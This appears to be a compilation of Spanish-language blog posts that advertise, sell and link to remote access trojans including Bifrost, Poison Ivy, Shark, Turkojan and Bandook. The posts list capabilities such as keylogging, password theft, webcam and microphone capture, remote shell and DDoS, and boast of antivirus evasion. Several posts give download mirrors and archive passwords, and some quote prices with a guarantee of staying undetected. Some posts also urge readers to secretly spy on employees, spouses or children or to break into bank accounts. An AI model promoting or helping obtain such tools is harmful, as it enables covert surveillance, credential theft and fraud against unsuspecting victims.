Jumper trojan es la nueva version del espectacular troyano privado Biohazard, en esta nueva version se renovo totalmente el diseño y se actualizo gran parte del codigo, agregandole nuevas caracteristicas como la captura de contraseñas, estadisticas de conexiones, chat con la victima, informacion del sistema, etc.
Y por supuesto sigue siendo estable, rapido y 100% indetectable a todos los antivirus, incluyendo la defensa proactiva del kaspersky internet security 2009.




Caracteristicas Jumper Trojan 3.2:
-Administracion de archivos
-Captura de pantalla
-Captura de camara
-Keylogger (captura de teclas)
-Contraseñas
-Shell remota
-Aplicaciones instaladas
-Administrador de procesos
-Chat con la victima
-Listador de servicios
-Informacion de la pc remota
-Notas del servidor
-Estadisticas de conexion
-Cerrar server
-Desinstalar server
-Opciones
-Cambiar nombre

Garantia
El Jumper trojan tiene una garantia de 6 meses, Al igual que el Troyano biohazard, osea que si en 6 meses te detecta el server del troyano algun antivirus inmediatamente te lo reemplazamos por uno nuevo indetectable.
Esto no quiere decir que despues de los 6 meses te lo detecten (tenemos herramientas privadas hace mas de 1 año y siguen siendo indetectables).

Compras
El Jumper Trojan tiene un costo de 80€, se paga via western union para todo el mundo, los residentes en España pueden pagar mediante un giro postal directamente al programador.
En el siguiente dia habil de haber recibido el pago se envia el troyano completo.
Si estas interesado en comprarlo escribinos desde la pagina de contacto o agrega a gbl-hack@hotmail.com

No hay versiones gratuitas, demos, trials ni nada parecido, no se hacen descuentos ni se le regala gratis a NADIE.

Esta es la primera version de un nuevo troyano liberado antes de ayer, al parecer es como una convinacion del shark, poison ivy y bifrost. Tiene las mejores de sus caracteristicas combinadas.

Lo que mas se destaca es su opcion Broadcast en el cliente, que permite trabajar con las victimas que se seleccionen de manera masiva, por ejemplo se pueden seleccionar todas las victimas y mostrar los passwords de sus pcs, o usar la consola de todas las victimas para hacer el famoso "ping de la muerte".

En la creacion del server se puede apreciar que se incluye un "file binder" y un "anti debuggin" bastante completo.

Y lo demas, tiene lo tipico de cualquier troyano, lo detecta nod32 y kav 7 al toque, pero para ser la primera version y beta esta muy completo.

Algunas imagenes

Caracteristicas oficiales :
----------
- FWB (DLL Injection, The DLL is Never Written to Disk)
- Decent Strong Traffic Encryption
- Try to Unhook UserMode APIs
- No Plugins/3rd Party Applications
- 4 Startup Methods (Shell, Policies, ActiveX, UserInIt)
- Set Maximum Connections
- Built-In File Binder
- MultiThreaded Transfers
- AntiDebugging (Anti VMware, VirtualPC, Anubis Sandbox..etc)

Broadcast :
-----------
- Server Options
- Search
|_Search Files
|_Search Windows

- Passwords
|_Misc Passwords
|_FireFox Passwords

- Suspend Options
- Upload Key Logs
- HTTP Download
- DOS Command
- Memory Download
- USB Monitor

Function :
----------
- Managers
|_File Manager
|_Search Files (Threaded)
|_Window Manager
|_Registry Editor
|_Search Registry
|_Process Manager (Terminate, Suspend, Resume and Restart Processes)
|_Modules List (Unload DLL From One Process or From All Processes)
|_Device Manager *
|_Startup Manager (Registry and Startup Folders)
|_Clipboard Manager (Text and Files)
|_Service Manager (With Drivers Support)

- Surveillance
|_Screen Capture (With PNG Compression)
|_Webcam Capture (Supports Multiple WebCams)
|_Key Logger
|_Monitoring
|_USB Drives (With Auto Copy Files To USB)
|_Clipboard

- Information
|_PC Information
|_User Accounts
|_Available Accounts
|_Logon Sessions
|_CD Keys (Custome List)
|_Installed Apps.
|_Network Adapters
|_Active Ports *

- Passwords
|_Misc Passwords (Live Messenger and No-IP DUC)
|_FireFox Passwords (Supports Firefox 2 and 3)
|_LSA Secrets

- Miscellaneous
|_Memory Execute (Execute From HTTP or From Local)
|_Message Box
|_Command Prompt
|_Display Settings
|_Suspend Options
|_Script Creator

- Net Tools
|_Web Server
|_Socks Server
|_Web Transfers (HTTP Download, FTP Upload and Download)
|_Port Scanner
|_Host Redirect

Descarga:
PaiNRAT 0.1 Beta (Pagina oficial pass: HackTheDarkness.com)
PaiNRAT 0.1 Beta (Mirror subido por mi ya configurado)

Pagina oficial:
HackTheDarkness.com

Manual:
Manual PainRAT 0.1 por DNSX

Para los que no lo conocian, les presento el Flux V1.0.1, la versión final de un exelente troyano creado a fines del 2004 por Gargamel.
En su época fue el mejor troyano junto con Bifrost. "Murió" porque se abandono el proyecto y se hiso muy detectado por los antivirus, mientras bifrost siguió con nuevas versiones, y el poison ivy recien se estaba desarrollando.
El troyano es bastante viejo y dificil de dejar indetectable, pero tiene algunas características únicas que hacen que valga la pena su uso.

Las caracteristicas que mas se destacan son:
-Su captura de pantalla es la mas rápida de todos los troyanos, se asemeja mas a la de un programa de administración remota.
-Permite ver los logs del keylogger y las contraseñas de las victimas aunque esten offline, solo es nesesario dejar el flux abierto para que capture las teclas y las contraseñas.
-Tiene la posibilidad de ver todas las webcams y escritorios de las victimas directamente desde la pantalla prinsipal del troyano.
-Tiene una opcion para descargar y ejecutar un archivo desde la web masivamente en las victimas seleccionadas.

caracteristicas oficiales:
- Actualizar el servidor del troyano
- Capturar contraseñas
- Capturar todo lo ingresado por el teclado
- Cerrar, apagar o reiniciar el sistema infectado
- Controlar el entorno Windows del equipo infectado
- Crear capturas de la pantalla actual
- Crear capturas de la Webcam
- Descargar y ejecutar archivos
- Desconectar y reconectar el equipo infectado a Internet
- Instalar un proxy SOCKS4
- Listar y eliminar procesos y tareas activas
- Mostrar ventanas con mensajes



Descarga:
Flux V1.0.1 (rapidshare)
Flux V1.0.1 (mediafire)

Manual:
Manual de troyano Flux por BenRu

Hoy salio al mercado del malware algo muy especial, se trata del nuevo Troyano privado BioHazard 3.2, es 100% indetectable a todos los antivirus y firewalls, es estable, rápido, de muy fácil uso y posee todas las características de un buen troyano.


El troyano posee nuevos métodos de inyección y ocultacion que permiten saltear a los antivirus como si nada incluyendo la defensa proactiva del Kaspersky 2009, esta demás decir que se saltea también a los mejores firewalls.
El codigo avanzado y limpio permite reducir el ping y mejorar la velocidad en la captura de pantalla y de cámara (supera notablemente al bifrost y poison ivy).
Metodo de autoinicio actualizado, para que el troyano se inicie perfectamente en Windows Vista.
La interfaz del BioHazard se diseño para que sea usado por personas con conocimiento nulos de informática, ideal tanto para quienes quieran espiar a sus empleados, esposas o hijos, sin que se den cuenta como para los que quieran obtener datos confidenciales o contraseñas especificas de alguna pc.



Características básicas:
-Administrador de archivos [Imagen]
-KeyLogger [Imagen]
-Captura de Pantalla [Imagen]
-Captura de cámara [Imagen]
-Procesos/Matar [Imagen]
-Shell remota [Imagen]
-Enviar Mensajes de error/advertencia [Imagen]
-Procesos inteligentes

Garantía
Garantía de indetectabilidad de 6 meses sin cargo, a partir de los 6 meses se cobrara una comisión mínima por su reemplazo.

Compras
El troyano BioHazard 3.2 Privado completo tiene un costo de 65 Euros, si estas interesado en comprarlo agrega a gbl-hack@hotmail.com o escribanos desde la PAGINA DE CONTACTO.
Tu pregunta no nos molesta, pregunta sin compromiso de compra.

Ya esta corriendo por la red la version 1.2d del bifrost, supuestamente es una modificacion de la version 1.2c, version privada y oficial creada por KSV, que estaba a la venta por unos 200 dolares.
Alguien se quejo de que la detectaban algunos avs y la publico...
Dentro de todo lo que mas se destaca con respecto a versiones anteriores es el "file manager", se le agregaron muchisimas mejoras.
Tambien el server ahora corre en windows vista 64 bits y es mas indetectable, aunque no creo que dure mucho tiempo, como paso con la version 1.2b.

Mejoras no oficiales por troyanosyvirus.com.ar:
-Mejoras en la ocultacion:
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.

-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"

-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.



Descarga:
Bifrost 1.2d (mediafire)
Bifrost 1.2d (rapidshare)

Ya salio la version 3.1 del troyano shark, la ultima conocida era la 3.0, que era bastante inestable y cuando se tenia muchas victimas se desconectaban por razones desconocidas, en esta version se soluciono eso, ademas de ocultarse mas, para que sea mas dificil encontrarlo y borrarlo, por ahora es mas indetectable que la anterior, y tiene algunas pequeñas caracteristicas nuevas.

Changes
* Server-Summary had a mistake
* Client now uses Double-Variable Type for calculating Idletime
* Statistics Window not resizeable anymore
* Server-Auth-Window had an old sharK icon
* DOS Shell will be started automatically (when auto-refresh is activated)
* ADS is no longer set as default install folder since the installation routine needs more time
* RegExport & Plugin Installation working with Createprocess instead of shell() -> Faster!
* Plugin Uninstalling is way faster
* Faster File/Registry Listing
* Fixed some typos
* sharK Autosizes Columnheaders
* Regstartup-Resetting is more aggressive
* Server did not reconnect some times when disconnecting from the internet
* Some little changes
* sharK offline keylogger not noticeable anymore by lagging keyboards
* Added few idiotchecks (e.g. Servername Restriction)
* Faster GUI
* Renamed "Autostart Manager" -> "Startup Manager" and moved to "SYSTEM" menu
* Confirmation box before client exit
* Tr Queue has Minimize Button
* Better Ping Handling

Bug Fixes
* Sleep until next reboot now working
* Shark sometimes removed too many startup entries
* Fixed ShellWait() Routine -> Wait_For_Files_Termination (Server File Binder) is now working
* sharK adds Hash-Value of Path into Thumbpreview-Files for prevent problems with equal filenames
* shark crashed when making SIN Window too small
* sharK didn't list installed apps when Distributor, Version or Uninstallstring is missing
* Little fix in Pluginsystem
* Fixed Bug in Modulelisting/Pluginuploading
* 3.0 Servers are not updateable when having spaces in path

New Features
+ sharK shows total queued files/size in transfer queue + total ETA; transfer queue smaller sized
+ Memory Injection in Filebinder possible as Startmethod
+ You can move your transfer-items up/down in your queue
+ sharK uses Transfer-System for receiving keylogger-offlog -> VERY fast but not compatible to shark 3.0 server
+ You can hide the featurewindow taskbar
+ sharK will remove titlebar/form border when maximizing a feature window
+ sharK re-sets periphery blocks each 200ms when suspending/deactivating/locking stuff (e.g. keyboard) for prevent bypassing
+ Recoded Server installation part - MUCH faster installation!
+ You can capture only the foreground window optionally
+ Remote URL Monitor (Firefox, Netscape, Opera, Internet Explorer & Derivates)
+ Remote Clipboard Monitor
+ Keylogger seperates logs for each window
+ You can autosave the desk previews in the server folders
+ You can set "No Server Installation" in server builder
+ You can set "Also Start Server when installation fails" in server builder
+ You can see the desktop preview also in Report-Listview
+ Remote Chat Monitor (Working with: QIP, QIP Infium, Miranda, Miranda Me, ICQ Lite, ICQ6, Waste, Yahoo Msg, MSN 4)
+ Socks4 Reverse Proxy (STABLE! NO Beta anymore!)
+ Server will also start bound files when another server instance is already running
+ sharK does not use jpglib anymore, Pics are made smaller by setting BitsPerPixel --> Faster Screencap, Webcam Cam, Thumb & Preview Creation
+ You can set the remote clipboard
+ Serverprocess will be marked blue in Process/Open Port-List
+ You can sort almost every listview (asc & desc)
+ New Popup Style + Serverwindow will be opened on popup click
+ SharK now saves its settings via a configuration file, not via registry - old important settings are importable (port & password)
+ Profilesystem for Serverbuilder
+ Liteserver! (~600 Bytes)
+ sharK highlights own startup entry in Startup Manager
+ sharK does not connect all socket tunnels on connect. Only when opening the server window, shark will link the cam/screen/transfer socket
+ Startup Monitor: SharK servers will warn the clients when their startup entries are removed and aggressive mode is activated

Releases Notes
* Serversize: 168 KB (with fwb++, packed)
* Most Features are only working with a 3.1 server of course, some old features are not working on 3.0 servers due to syntax changes
* Due to massive changes, the sharK 3.1 client cannot interact anymore with shark 3.0.0 keyloggers
* The URL and Chat Monitor are unique features in a beta state. Wrong Results are possible.
* Due to the new connection system you can't use 3.1 servers with 3.0 clients

Descarga:
Shark 3.1 Fixed (pagina oficial)
Shark 3.1 Fixed (rapidshare)

Para los que no saben ingles o no les gustan tener su bifrost en ingles, b# lo tradujo a español casi completamente, esta muy bueno el trabajo, muy completo, lo realizo con un poco de ayuda de polifemo y de los colaboradores de indetectables.net
El cliente sigue estando desempaquetado por lo que pueden seguir modificandolo si quieren.

Imagenes:

Descarga:
Bifrost 1.2.1 en Español (rapidshare)
Bifrost 1.2.1 en Español (megaupload)

Hace unos dias salio la version 1.3.3 de un troyano llamado RCBF, es muy parecido al bifrost en su aspecto y en caracteristicas, pero este es indetectable por ahora y tiene nuevos metodos de salteo de firewall y ocultacion.
La creacion del server se realiza fuera del cliente con un builder que viene incluido en la descarga, al parecer no funciona en pcs remotas que ya tengan un server del bifrost instalado, a menos que se le de la opcion "update" desde el bifrost si ya se tiene como victima.
Al crear el server este ya viene incluido con el keylogger y el pack de extencion, a diferencia de el bifrost que da la opcion de elejirlo o no.

Imagenes:

Cuando analize el builder y el cliente me di cuenta que escanea unas ips (60.216.0.0/16 y 199.176.0.0/16) en el puerto 445, no se para que realiza eso, les aviso antes para que no digan que posteo cosas con "regalitos" eso viene de parte del autor y no se para que servira.
Les dejo los analisis de anubis

Analisis del Cliente
Analisis del Builder

Descarga:
RCBF v1.3.3 Evaluation Edition Released (pagina oficial)
RCBF v1.3.3 Evaluation Edition Released (rapidshare subido por mi)

Pagina oficial: http://hi.baidu.com/redchilde

Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.

Lo nuevo:

• Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
• Now you can record video from remote webcam.
• Audio streaming feature added.
• Now you don't need to download images from remote computer,you can view them with thumbnail manager.
• You can get MSN logs with MSN Sniffer.
• You can block harmful web-pages on remote computer.
• You can manage remote computer with ms-dos commands.(Remote Shell)
• New functions added for server secrecy
• -Now it is harder to delete server
• -Server can't be show in registry,searching files,msconfig,etc.
• -Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
• -Server prevents system restoring.It deletes all system restore points.
• Server size is %60 smaller now.
• Connection bug fixed
• Now server can't be dedectd by any anti-virus software,
• but i think it will be dedected soon.
• Some changes were made in Client appearance
• Now advanced keylogger can capture clipboard changements.
• You can install any file to remote computer from internet via Remote Downloader.
• Now you can get more information about remote computer.
• You can learn installed softwares on remote computer.
• Help mode added.So you can create visible servers.

Imagenes:



En español:



Editado:
Cuando lo ejecutan al cliente modifica su pagina de inicio por la pagina principal del troyano del Internet Explorer 6.
Si nesecitan saber como sacarla dejen un comentario asi les respondo.

Descarga:
Turkojan 4 (pagina oficial)
Turkojan 4 (mirror rapidshare)

Manual: Tutorial Turkojan 4.0 + Metodo indetectable

Pagina oficial: www.turkojan.com

Esta version del bifrost 1.2.1 viene desempaquetada, lo que permite que lo modifiquemos a nuestro gusto con el reshacker u otro programa. Por ejemplo le podemos cambiar todos los textos, traducir a otro idioma, se pueden modificar los botones, los menus, las imagenes, los cursores, etc. Y lo mejor de todo es que permite modificar el stub para que el el bifrost genere servidores indetectables, esto ya es algo mas complicado pero posible, despues pondre algun manual. Otra utilidad que tiene es que se puede encriptar el cliente para que nuestro antivirus no le detecte, yo lo uso de esa manera y funciona de maravilla con nod32 y AVG. Y son muchas mas las utilidades que se le puede dar a esta version, solo es cuestion de un poquito de imaginacion.

Les dejo algunas imagenes que tome recien

Descargas:
Bifrost 1.2.1 unpacked
Reshacker 3.3.4.75 en español
Video sobre el tema por polifemo

Ya salio el troyano shark 3, exactamente compilado el 17-1-2008 en VB, troyanosyvirus.com.ar es el primero en presentarlo.
Este troyano tal vez sea el sucesor del bifrost y del poison ivy debido a su gran estabilidad, velocidad, ocultacion, calidad y cantidad de herramientas, ademas de muchas caracteristicas innovadoras no incluidas en ningun troyano. A continuacion les dejo muchas de las caracteristicas escritas por mi, supongo que debe tener errores pero es lo que ay.

Caracteristicas no oficiales por troyanosyvirus.com.ar:

-mRC4 Encriptacion de trafico
-zLib Compresion de Trafico
-Instalacion por defecto, incluye 7 opciones
-Pasword de conexion
-Permite seleccionar el intervalo de tiempo para la conexion del server
-keylogger, con caracteristica highlight, permite seleccionar maximo de tamaño del log, permite buscar.
-Testear los host
-Nombres de instalacion y extensiones aleatorias
-HKML startup
-Reg-HKU startup
-Eventos al ejecutar el server, (ejecutar archivo o abrir pagina web)
-Incluye un binder completo en la creacion del server, asi que olvidensen de andar buscando binders, joiners, etc.
-Blacklist, permite matar, frezar, cerrar, etc un proceso o parar, pausar, cerrar, etc un servicio
-Antidebugging, incluye maquina virtuales como VMWare, virtualBOX, etc
-Metodos de ocultacion, muy buenos.
-Firewal by pass
-Opciones avanzadas, claves del stuff aleatorias, compresion, tolerancia... etc
-Sumario final
-Comprimir con UPX
-Cargar y guardar configuracion
-Configuracion del server
-Blacklist
-Noticias
-Informacion del sistema
-Aplicaciones instaladas
-CD keys
-Autostart manager
-Administrador de procesos
-Administrador de servicios
-Administrador de archivos
-Editor de registro
-Administrador de ventanas
-Busqueda de archivos
-Puertos abiertos
-Redireccion de DNS
-Opciones de suspencion, apagar el sistema, reiniciar, suspender monitor, suspender administrador de tareas, etc
-Captura de pantalla, rapida, con muchas opciones, permite utilizar el teclado y el mouse en la pc victima
-Captura de la webcam
-Captura de audio
-Shell remota
-Web Downloader
-Ejecucion de memoria
-Chat con la victima
-Imprimir en la pc victima
-Vistas de escritorios en miniaturas
Y muchisimo mas

Imagenes:



Wallpaper oficial del shark (clic en la imagen para ampliar):



Descarga: Shark 3.0.0
Pagina oficial: http://shark-project.info

El 2008-01-07 salió la nueva versión del famoso troyano Poison ivy, version 2.3.1, es un poco mas indetectable que el 2.3.0, pero no creo que dure mucho tiempo por ser un troyano tan conocido, pero mejoraron bastantes bugs y agregaron algunas cositas. como principales cambios con respecto a la versión 2.3.0 tenemos:

->Device Manager, desde donde podemos administrar remotamente los dispositivos instalados, siendo posible Habilitar, Deshabilitar y Remover de manera segura algún dispositivo como teclado, mouse, impresora, CDROM, USB, etc.
->Ahora en cada conexión podemos tener una imagen en miniatura del escritorio de cada PC, la cual se va actualizando cada cierto tiempo, o cada vez que nosotros queramos, pudiendo modificar el tamaño de esta imagen.
->Se ha agregado la opción de crear una entrada de inicio en el registro dentro de HKLM/run.
->Ahora las carpetas seleccionadas, tanto en el file manager como en el registro, serán resaltadas de color rojo
->Podemos elegir si queremos o NO inyectar el proceso del server dentro de otro proceso. En la versión anterior se inyectaba por defecto en el navegador.
->Escuchar un sonido determinado con cada nueva conexión.
->Soporta las versiones 2.2.0 y 2.3.0
->Soporta Windows 2000/XP/2003/Vista
->El color del ícono en la barra de tareas a cambiado de plomo a un simpático color verde

Imagenes:

Y aqui todos los cambios realizados oficialmente en ingles, no tengo tiempo para traducirlo pero se entiende de todas formas, si alguien lo quiere traducir asi lo postee se le agradeceria:

Changelog:

[+] - Feature added
[-] - Feature removed
[*] - Bug fixed on existing feature

[+] Device Manager
-> Save To File
-> Enable/Disable/Safe Removal
-> Display Info
-> Show hidden devices
[+] See ADS in file manager
[+] Expand/Collapse Tree in file and registry manager
[+] Thumbnail of desktop (gets updated every ping or manually by pinging), change size in settings
[+] Copy Profile
[+] HKLM/run startup
[+] Play sound on new connection
[+] Date in Connection Log
[+] Choose file alignment
[+] Choose to copy the file to ADS
[+] Selected folders/keys in file and registry manager are highlighted
[-] Share: inject into another process
[*] No need to restart servers that has been connected to older client
[*] Can now build non-injecting servers
[*] Changed the terms of use
[*] Troyanosyvirus.com.ar
[*] Uploading a file that already exists (but not in cache) will now be overwritten properly
[*] Update now works with servers that has different install paths
[*] Fixed a access violation when clicking Cancel too fast in the download dialog
[*] ActiveX now starts on restricted accounts too (must first be installed on admin account)
[*] Test Connection with Key File now works
[*] Clear Stats now doesnt remove active connection count
[*] Client should now be able to handle more active connections
[*] Load/Save bug fixed in DNS/Port editor
[*] Generate Key File had a bug causing it to generate weak passwords
[*] Fixed a bug that made it impossible to share new servers (2.3.0)
[*] Autosave images now saves with a timestamp

Actualizado: esta version tenia un pequeño error, ya esta arreglado asi que cambie la descarga por la version ultima version 2.3.2, es la misma que la 2.3.1 solo que con ese error reparado.

Descarga:
Poison ivy 2.3.2 (pagina oficial)
Poison ivy 2.3.2 ( mirror subido por mi)

Pagina oficial: www.poisonivy-rat.com

Les presento este troyano relativamente nuevo, el DarkLabel 1.0 B4, se esta haciendo medio conocido para ser la version 1.0. A mi personalmente no me gusto. Requiere del archivo MSWINSCK.OCX para funcionar, Y en muchas PC no lo tienen por lo tanto no funciona el server. La captura de pantalla es muy mala, pero tiene algunas caracteristicas que no tienen muchos troyanos.
Esperemos que salga la nueva version de este troyanito haber si mejora algunas cosas.

Compiled at 6-12-2007

Caracteristicas:

- Information
- File Manager
- CMD Shell
- Process Manager
- Key Manager
- Downloader
- Screen Manager
- Window Manager
- Passwords
- HTTP Server
- Connection Bouncer
- TCP Tunnel
- MSG Manager
- Clipboard Manager
- Run URL/File
- Power
- Broadcaster

Descargar: DarkLabel 1.0 B4 (De su web oficial)
Web Oficial: http://www.darklabel.uni.cc/
MSWINSCK.OCX: Descarga MSWINSCK.OCX (Archivo requerido para abrir el cliente)

Salio a luz La version privada del poison ivy 2.1.4, al server solo sin encriptar ni nada lo detectan solo 5 antivirus que nadie usa.
Si lo encriptan con themida 1.8.5.5 lo detecan solo 3 antivirus pero no como troyano, sino como bot o como archivo encriptado. Lo malo de estas versiones privadas es que no vienen de la pagina del creador por lo tanto podrian tener "regalito", yo me arriesgue y lo probe, y funciona de maravilla creo que me voy a quedar con este.
Por lo visto el cliente es exactamente el mismo, lo unico que cambio es que es mas indetectable.

Descarga:
Poison Ivy 2.1.4 version privada (google pages)
Poison Ivy 2.1.4 version privada (mirror rapidshare)

Se que mas de uno habra escuchado algo relacionado con el troyano bancario, se que mas de uno tendra las ganas de usarlo, y en este caso ya contamos con una version publica del famoso troyano “Bandook”, conocido como el troyano bancario, con la especialidad de poder grabar lo que sucede en el escritorio de nuestra victima. En mi opinion personal este es el mejor troyano que existe, lastima que es muy detectado, pero todo se puede hacer indetectable. Otra de sus ventajas es que usa un servidor VNC para realizar las capturas de imagenes. Permite realizar varias descargas simultaneas desde web, caracteristica muy importante que aun le falta a la mayoria de los troyanos. Ademas permite grabar lo que se escucha por el microfono de la victima. Y muchas mas herramientas.
En conclusion: tiene todo lo nesesario para hackear cuentas bancarias.

Y les dejo algunas caracteristicas tecnicas del programa, no tengo ganas de traducirlo pero se entiende lo mismo:

Features list of the Program:

· Firewall bypass method: FWB#++ (Code Injection , API Unhook , Kernel Patch)
· reverse connection, all traffic through one port
· Safe Thread Based Client
· Persistance (Irremovable)
· Rootkit
· Plugins Based Server (30 KB Packed)
· Very Friendly Graphical User Interface
· Different Installation Pathes
· PNG / JPEG Compressions for screencapture and webcam

Managing Features:

· Filemanager with all types of functions, including Folder Mirror , Rar Folder/Files , File Search , Infect Files , Multiple Files Download / Upload , Download / Upload manager
· Registry Editor with all type of Functions
· Process manager (Shows Full path , and Modules Manager)
· Windows Manager (including a Send Key Function)
· Services Manager

Connection Features :

·Socks 4 proxy
·HTTP / HTTPS proxy
·Port Redirection
·TCP TUNNEL
·HTTP WEB Server
·FTP Server
·Remote Shell
·Flooding ( Mailbomb , DDOS attacks)

Spying Features :

·Screen manager with Screen Clicks
·Cam manager that Supports system with Multiple Cams
·Mic Manager (Record voice from Mic)
·Ims Spy (MSN,YAHOO,AIM)
·Keylogger ( live One )
·Offline keylogger (Colored HTML) , Live Passwords , IMS Spy with
Automatic Delivery to FTP
·Cached PWS Fetcher [6 embended PWS Plugins]
·VNC (Remote Desktop Live Control)
·Site Detection : Check all ur vics and know which one visits a specific site
·Clipboard manager
·Information about the remote machine
·Cache Reader
·Screen Recorder ( Record the user activities on the Screen into AVI Movies)

Descarga: Bandook 1.35 (de su pagina oficial)
Pass del .rar NWC

Página Del troyano: http://www.nuclearwintercrew.com

este troyano lo saque de un ezine y le hice algunas modificaciones para que no fuera tan facil de detectar. El infector.exe infecta el ejecutable que tu quieras y lo envias a la victima.. despues te conectas a traves del cliente y eso es todo. DONDE ESTÁ LA GRACIA DE ESTE TROYANO!! Y LA P** MADRE... trankilo.. no os escandaliceis... la gracia es que cuando la victima se infecta.. este troyano infecta a todos los demas archivos de la pc y Aunque borre el original tendria que borrar todo lo que tiene como para deshacerse de el XD pero trankilo... es controlable... si te autoinfectas.. puedes desinfectarte con el mismo cliente. Ademas infecta el kernel entre otras cosas XD

Descarga kuang II 4ever

MSN Nightmare és una pequeña aplicación que te permite interceptar remotamente todo lo que se envia o recibe del msn messenger e incluso intervenir en medio de una conversación suplantando el pc en el que está instalado. A día de hoy no es detectado por ningún antivirus y cómo utiliza técnicas de inyección tampoco es detectado por ningún firewall.

Características:

* Espiar conversaciones de msn messenger
* Intervenir en una conversacion suplantando al pc remoto
* Evitar recepción i/o envio de mensajes
* Recuperación de passwords del messenger (en el registro y por keylogger)
* Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
* Desinstalar remotamente
* Shell Inversa
* Pequeña utilidad para comprobar si tienes los puertos del router abiertos
* Función subir log de conversaciones y passwords a ftp para no tener que abrir puertos
* Conexión sin necesidad de determinar ips
* Mucho mas estable que la versión 1
* Escaneado con 21 antivirus, no es detectado por ninguno.

Imagenes

Pantalla prinsipal:


Con la victima conectada:



Descargar:
MSN Nightmare v2.2 (pagina oficial, no funciona aveces)
MSN Nightmare v2.2 (mirror rapidshare)

pass: msnNightmare

Pinch Builder es un conocido troyano basado en lenguaje Assembler.
Cualquiera puede descargar la muestra, y adaptarla a sus propias necesidades.
El código binario original pretende acceder un área conocida como Windows Protected Storage (Almacén protegido de Windows), que es el lugar donde se guardan las contraseñas de usuario “seguras”, y extraer la información.
El resultado obtenido es directo: los datos del usuario quedan expuestos.

Además, puede extenderse su funcionalidad para hacerlo trabajar como un registrador de pulsaciones (keylogger), o un robot de envío de correo masivo, o incluso actuar como un anfitrión para código malicioso adicional.
El programa original, está diseñado para multiplicarse mientras el ordenador inicia el proceso de apagado, eludiendo los sistemas de seguridad, pues estos generalmente se cierran también en ese momento.

Aki les dejo la descarga directa de esta herramienta que esta muy copada ^^

DESCARGAS:

MIRROR RAPIDSHARE
MIRROR FILEFACTORY
MIRROR SENDSPACE

pass: www.0x90.com.ar

fuente www.0x90.com.ar